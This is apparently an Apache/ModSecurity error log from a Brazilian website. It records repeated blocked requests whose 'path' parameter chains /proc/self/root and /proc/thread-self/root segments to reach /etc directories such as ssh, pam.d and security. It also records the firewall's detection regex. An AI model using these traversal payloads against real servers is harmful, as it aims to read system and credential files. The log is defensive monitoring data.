[Fri Mar 20 06:39:03.183122 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:55440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vt_XLqtnMIWvjpaKJswAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:39:11.780174 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.243.128:52378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vv11pVZ5mVmJwsFMfcAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:39:17.683813 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:58340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VxDJ3M9BSuKP7CAYHxQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:39:32.806888 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:58356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0V1DJ3M9BSuKP7CAYH3AAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:39:44.409710 2026] [mime_magic:error] [pid 26799:tid 140411699963648] (70014)End of file found: [client 57.141.18.66:43744] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:39:55.117636 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.241.31:55452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0V6_HIg5MgXLBnicPpGwAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:40:02.928944 2026] [mime_magic:error] [pid 7893:tid 140411582465792] (70014)End of file found: [client 57.141.18.26:44362] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:40:08.522938 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:38088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0V-PqxLDW4GITHUkTVDAAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:40:15.207381 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:41546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0V_7ninkcc-iUj5ApOcQAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:40:20.404195 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:46996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WBDJ3M9BSuKP7CAYIEgAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:23.792126 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:35888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WB_XLqtnMIWvjpaKJ5AAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:34.178593 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:35892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WEgF0L0L-SsrnPo5XZAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:34.381653 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:41552] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WEta6ubjKNq_cu4bCngAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:40:38.939241 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:45688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WFuoXxyEfFpUF8f9xvAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:40.212883 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:48752] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WGOoXxyEfFpUF8f9xvwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:48.676239 2026] [mime_magic:error] [pid 7235:tid 140411649607424] (70014)End of file found: [client 57.141.18.3:45840] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:40:49.487919 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.243.128:48768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WIV1pVZ5mVmJwsFMfpQAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:50.779445 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:53132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WIgF0L0L-SsrnPo5XeQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:52.026483 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:53140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WJDJ3M9BSuKP7CAYIOgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:53.347939 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:53142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WJda6ubjKNq_cu4bCoQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:54.583962 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:53146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WJl1pVZ5mVmJwsFMfpwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:40:56.877786 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:53150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WKOoXxyEfFpUF8f9xywAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:41:06.232844 2026] [mime_magic:error] [pid 7893:tid 140411548894976] (70014)End of file found: [client 57.141.18.120:46392] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:41:14.475126 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:39786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WOjJ3M9BSuKP7CAYIUwAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:41:16.826430 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.241.31:52104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0WPPHIg5MgXLBnicPpQAAAAc0"], referer: 